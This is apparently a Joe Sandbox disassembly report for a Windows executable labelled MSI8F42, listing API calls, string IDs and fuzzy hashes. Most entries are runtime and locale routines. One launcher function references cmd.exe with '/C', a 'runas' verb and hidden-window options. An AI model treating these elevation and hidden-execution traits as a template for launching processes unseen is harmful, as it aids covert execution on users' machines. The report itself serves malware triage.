                                                                                                                                            APIs
                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,?,?,0032596A,00000001,00000364,?,00000006,000000FF,?,00316CE7,00000000,A82,00000000), ref: 003270FC
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                            • Opcode ID: 7764497418bf9ed09dcc9c0beda91b782de01a391ae7f768562779938e61a3aa
                                                                                                                                            • Instruction ID: 8354a71773e0599ca98d500b95c2218334c6e700e972a91c3b92675ab5e14197
                                                                                                                                            • Opcode Fuzzy Hash: 7764497418bf9ed09dcc9c0beda91b782de01a391ae7f768562779938e61a3aa
                                                                                                                                            • Instruction Fuzzy Hash: A6F0E23120C2306AEB335A22BC02B5BB75DBF517B1F168021BC149E190CF30FC1186E1

                                                                                                                                            APIs
                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 002F549C
                                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 002F551D
                                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 002F5601
                                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 002F5637
                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 002F567C
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 002F5685
                                                                                                                                            • AllowSetForegroundWindow.USER32(00000000), ref: 002F568B
                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 002F56AB
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 002F56AE
                                                                                                                                            • Sleep.KERNEL32(00000064,?,?,?,?,?,?), ref: 002F56CA
                                                                                                                                            • EnumWindows.USER32(002F5830,?), ref: 002F56DF
                                                                                                                                            • BringWindowToTop.USER32(00000000), ref: 002F56F4
                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 002F5711
                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 002F571B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$AddressExecuteForegroundHandleModuleProcShellWindows$AllowBringCodeDirectoryEnumExitObjectProcessSingleSleepWait
                                                                                                                                            • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$<S4$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
                                                                                                                                            • API String ID: 697762045-2715264502
                                                                                                                                            • Opcode ID: 0dbf86bcaa948ac28285fe6c08f34bde7eaa6c41158bd1a7c5c173b1d7009e0b
                                                                                                                                            • Instruction ID: 39d7a80c77f4435f134dc280a05cfc218df1581a75f800d14fb0c8966a1ac63d
                                                                                                                                            • Opcode Fuzzy Hash: 0dbf86bcaa948ac28285fe6c08f34bde7eaa6c41158bd1a7c5c173b1d7009e0b
                                                                                                                                            • Instruction Fuzzy Hash: 6BE1EF75E10A1A9BCF21DFA8C884BBEF7F5AF44350F544128EA15EB291E734AD00CB90
                                                                                                                                            APIs
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 002FCBB6
                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,0034E6D0,00000800), ref: 002FCBD3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: OpenQueryValue
                                                                                                                                            • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
                                                                                                                                            • API String ID: 4153817207-482544602
                                                                                                                                            • Opcode ID: b981871bee49b23e7faf53093240f014c8146cb846955d162778a872943da06c
                                                                                                                                            • Instruction ID: a2c2d20c4efc7d3b03fd4dc644cc3aa49d3d8f5df94ed446f3caf356ae047f21
                                                                                                                                            • Opcode Fuzzy Hash: b981871bee49b23e7faf53093240f014c8146cb846955d162778a872943da06c
                                                                                                                                            • Instruction Fuzzy Hash: 5EC1157892021F8BCB259F14C60127AF3A1EF917C0F74447AEA4A9B255E770DD61C790
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 003257CC: GetLastError.KERNEL32(?,00000008,0032AD4C,?,?,?,?,00000000,?,?), ref: 003257D0
                                                                                                                                              • Part of subcall function 003257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00325872
                                                                                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,003242D9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0032DEE5
                                                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,003242D9,?,?,?,00000055,?,-00000050,?,?), ref: 0032DF10
                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 0032DFA4
                                                                                                                                            • _wcschr.LIBVCRUNTIME ref: 0032DFB2
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0032E073
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                            • String ID: utf8
                                                                                                                                            • API String ID: 4147378913-905460609
                                                                                                                                            • Opcode ID: 0482975faeb0f71eb1f7c8ebe9d1208e3c3e4c4adab852418aa305f7680e47e4
                                                                                                                                            • Instruction ID: 97468ac16336f34ea86f4aafb5de55a82b14cfbec6e6fe2f0499bdd603b16ecd
                                                                                                                                            • Opcode Fuzzy Hash: 0482975faeb0f71eb1f7c8ebe9d1208e3c3e4c4adab852418aa305f7680e47e4
                                                                                                                                            • Instruction Fuzzy Hash: EE710872600321AADB27AB75EC46BAB73ACEF14700F164429F505DF181FBB4DD418750
                                                                                                                                            APIs
                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,7642E7B1,?), ref: 002F38CB
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 002F390B
                                                                                                                                            • Process32FirstW.KERNEL32(?,00000000), ref: 002F395F
                                                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,?), ref: 002F397A
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 002F3A8E
                                                                                                                                            • Process32NextW.KERNEL32(?,00000000), ref: 002F3AA2
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 002F3AF0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 708755948-0
                                                                                                                                            • Opcode ID: 93282f08fb946bbb94913c62f322ad5c6c2ecac8ee2fb31cd5e31f2b29608874
                                                                                                                                            • Instruction ID: e45923d99287d20774643ec0e54910d251b07595495e57bd0a1536c42ce73733
                                                                                                                                            • Opcode Fuzzy Hash: 93282f08fb946bbb94913c62f322ad5c6c2ecac8ee2fb31cd5e31f2b29608874
                                                                                                                                            • Instruction Fuzzy Hash: 55A11AB591124DDFDF11CFA5D988BEEBBF8BF48304F144169E905AB240D7B49A44CBA0
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                                                            • Opcode ID: 3671fe3ab2a430c9af524975a5392690b3920585d2af6b3259946b128feb46fa
                                                                                                                                            • Instruction ID: 6213973d7afd906d4d24c3dd229f991d66ccdeb50e7a53cefa3894d7369c40fd
                                                                                                                                            • Opcode Fuzzy Hash: 3671fe3ab2a430c9af524975a5392690b3920585d2af6b3259946b128feb46fa
                                                                                                                                            • Instruction Fuzzy Hash: 56D23C71E086288FDB6ACE28DD907EAB7B9EB44304F1545FAD84DE7240D774AE818F41
                                                                                                                                            APIs
                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,0032E8D1,00000002,00000000,?,?,?,0032E8D1,?,00000000), ref: 0032E64C
                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,0032E8D1,00000002,00000000,?,?,?,0032E8D1,?,00000000), ref: 0032E675
                                                                                                                                            • GetACP.KERNEL32(?,?,0032E8D1,?,00000000), ref: 0032E68A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale
                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                            • Opcode ID: 5874d681dbe531fc52e827a1c9c7b50510828c3def1aeff3cf7fc3bf55daf3d0
                                                                                                                                            • Instruction ID: 2ef8d69e3e5ca5c15117e6e9697bc9c18f864542ae4fb1a44d2a0c450da15b7c
                                                                                                                                            • Opcode Fuzzy Hash: 5874d681dbe531fc52e827a1c9c7b50510828c3def1aeff3cf7fc3bf55daf3d0
                                                                                                                                            • Instruction Fuzzy Hash: 7821B072B10120AADB37CF14E902A97B3AAAB74F64F578464E90AD7510E732DD40C350
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _swprintf$FreeLocal
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2429749586-0
                                                                                                                                            • Opcode ID: 0843c15cefdaec457f8203713ff2471fc40a335e104191cd37d4547dc4465548
                                                                                                                                            • Instruction ID: 008b7902ec3fae4d7a8b45dae617e45a2cc9c42aafcdf55bc90757be128055f0
                                                                                                                                            • Opcode Fuzzy Hash: 0843c15cefdaec457f8203713ff2471fc40a335e104191cd37d4547dc4465548
                                                                                                                                            • Instruction Fuzzy Hash: EFF1AE71D2021DABDF19DFA8DC40BAEFBB9FB08340F144229F905AB281D775A951CB91
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 003257CC: GetLastError.KERNEL32(?,00000008,0032AD4C,?,?,?,?,00000000,?,?), ref: 003257D0
                                                                                                                                              • Part of subcall function 003257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00325872
                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0032E894
                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0032E8DD
                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0032E8EC
                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0032E934
                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0032E953
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 415426439-0
                                                                                                                                            • Opcode ID: c63bd99b34d7672a9f01dcc00d2a2caa64448c66512bf3dba4646b0ea0f37af1
                                                                                                                                            • Instruction ID: 88435ca2c78cea5980b94417217259fec34c49529ac7f46372d0945e1876d3e5
                                                                                                                                            • Opcode Fuzzy Hash: c63bd99b34d7672a9f01dcc00d2a2caa64448c66512bf3dba4646b0ea0f37af1
                                                                                                                                            • Instruction Fuzzy Hash: 80517471A00225AFEF22DFA5EC46ABE73B8FF48B00F154069E950EB190D770D940CB61
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00312C98: EnterCriticalSection.KERNEL32(0034DD3C,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312CA3
                                                                                                                                              • Part of subcall function 00312C98: LeaveCriticalSection.KERNEL32(0034DD3C,?,?,?,002F23B6,0034E638,7642E7B1,?,?,00333D6D,000000FF), ref: 00312CE0
                                                                                                                                            • GetProcessHeap.KERNEL32 ref: 002F2365
                                                                                                                                              • Part of subcall function 00312C4E: EnterCriticalSection.KERNEL32(0034DD3C,?,?,002F2427,0034E638,00336B40), ref: 00312C58
                                                                                                                                              • Part of subcall function 00312C4E: LeaveCriticalSection.KERNEL32(0034DD3C,?,?,002F2427,0034E638,00336B40), ref: 00312C8B
                                                                                                                                              • Part of subcall function 00312C4E: RtlWakeAllConditionVariable.NTDLL ref: 00312D02
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$EnterLeave$ConditionHeapProcessVariableWake
                                                                                                                                            • String ID: <4$X4$\L4$pL4
                                                                                                                                            • API String ID: 325507722-3709691910
                                                                                                                                            • Opcode ID: 00e61b9479c710c1e7ac5103583e1794a296d9b896bdfb818e343722d69dbff1
                                                                                                                                            • Instruction ID: 348dc4d5e99d87be8f5552cb4ed3cff8371d8306475200ed9fb63f95b30bb732
                                                                                                                                            • Opcode Fuzzy Hash: 00e61b9479c710c1e7ac5103583e1794a296d9b896bdfb818e343722d69dbff1
                                                                                                                                            • Instruction Fuzzy Hash: 2C219AB5901200DBD312CF58EC4678AB7F8F726720F024268E9299F2E0DB7838188F52
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strrchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                            • Opcode ID: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                            • Instruction ID: b2dc61aead54ffea137336de239e7843ae870aa2faa470251fcba11c0deed841
                                                                                                                                            • Opcode Fuzzy Hash: c088d6f79354faf8b1bce494a29b4de1bf964f76c3977490bbe1990304a04063
                                                                                                                                            • Instruction Fuzzy Hash: A5B139729056659FDB17CF68D882BFEBBA5EF59310F168169E804EF241D234DE01CBA0
                                                                                                                                            APIs
                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003133B4
                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00313480
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 003134A0
                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 003134AA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                            • Opcode ID: ef44ea112e84ca1deabd691ea10f77295a7c9dc0f329b94c0baa36b067b5fcba
                                                                                                                                            • Instruction ID: b972d19d943b0b9df3b19fd8b111d487d7710577b8980fc1d381403fdbb6c358
                                                                                                                                            • Opcode Fuzzy Hash: ef44ea112e84ca1deabd691ea10f77295a7c9dc0f329b94c0baa36b067b5fcba
                                                                                                                                            • Instruction Fuzzy Hash: D7312CB5D0521C9BDB21DF64D9897CDBBB8AF08304F1040DAE50DAB250EB719B85DF44
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 002FC630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,7642E7B1,?,00333D30,000000FF), ref: 002FC657
                                                                                                                                              • Part of subcall function 002FC630: GetLastError.KERNEL32(?,00000000,00000000,7642E7B1,?,00333D30,000000FF), ref: 002FC661
                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,00348AF0), ref: 002FD0D8
                                                                                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00348AF0), ref: 002FD0E7
                                                                                                                                            Strings
                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002FD0E2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                            • API String ID: 3511171328-631824599
                                                                                                                                            • Opcode ID: 50c38836ec33213282742fb0ccef94d717e503924f1b238978f7765ce1fb0681
                                                                                                                                            • Instruction ID: 533397feb0a8d65f174c1ea931bcac3cd9385bdc23f9aea0e2fc13f9e1efb9ca
                                                                                                                                            • Opcode Fuzzy Hash: 50c38836ec33213282742fb0ccef94d717e503924f1b238978f7765ce1fb0681
                                                                                                                                            • Instruction Fuzzy Hash: 9DE06DB02147458FE3319F28D888752BBE8AB11784F00886CE956C3250DBB5E4488BA1
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 003257CC: GetLastError.KERNEL32(?,00000008,0032AD4C,?,?,?,?,00000000,?,?), ref: 003257D0
                                                                                                                                              • Part of subcall function 003257CC: SetLastError.KERNEL32(00000000,?,00000006,000000FF,?,?,?,?,00000000,?,?), ref: 00325872
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0032E28B
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0032E2D5
                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0032E39B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoLocale$ErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 661929714-0
                                                                                                                                            • Opcode ID: fbf15ab5a517aea4f4850ccebb6c57927faa292608afabe2cc3ae837cf18396b
                                                                                                                                            • Instruction ID: 130a48be893f76c109f2fcb922ef86a4d731084f21b14cc25d86dcfda5a492ce
                                                                                                                                            • Opcode Fuzzy Hash: fbf15ab5a517aea4f4850ccebb6c57927faa292608afabe2cc3ae837cf18396b
                                                                                                                                            • Instruction Fuzzy Hash: 5661BF719002279BEB2AEF29EC83BBA73A8FF08301F154179E915CB581E734D984DB50
                                                                                                                                            APIs
                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00316F13
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00316F1D
                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,?), ref: 00316F2A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                            • Opcode ID: f1e9ee5cf3d481facab13f77dc8312af881d952f91b99c74a7e485167e94c5ea
                                                                                                                                            • Instruction ID: cf22bca4924d84691b4fc3d699c6aeaa87a8dc75e58ffd37cf080f7111c3e629
                                                                                                                                            • Opcode Fuzzy Hash: f1e9ee5cf3d481facab13f77dc8312af881d952f91b99c74a7e485167e94c5ea
                                                                                                                                            • Instruction Fuzzy Hash: 8031B2B5901228ABCB26DF68D9897DDBBB8AF08310F5041EAE41CA6250E7709B818F44
                                                                                                                                            APIs
                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,7642E7B1,00000001,00000000,?,00000000,00334460,000000FF,?,002F474D,002F3778,?,00000000,00000000,?), ref: 002F45DB
                                                                                                                                            • LockResource.KERNEL32(00000000,?,00000000,00334460,000000FF,?,002F474D,002F3778,?,00000000,00000000,?,?,?,?,002F3778), ref: 002F45E6
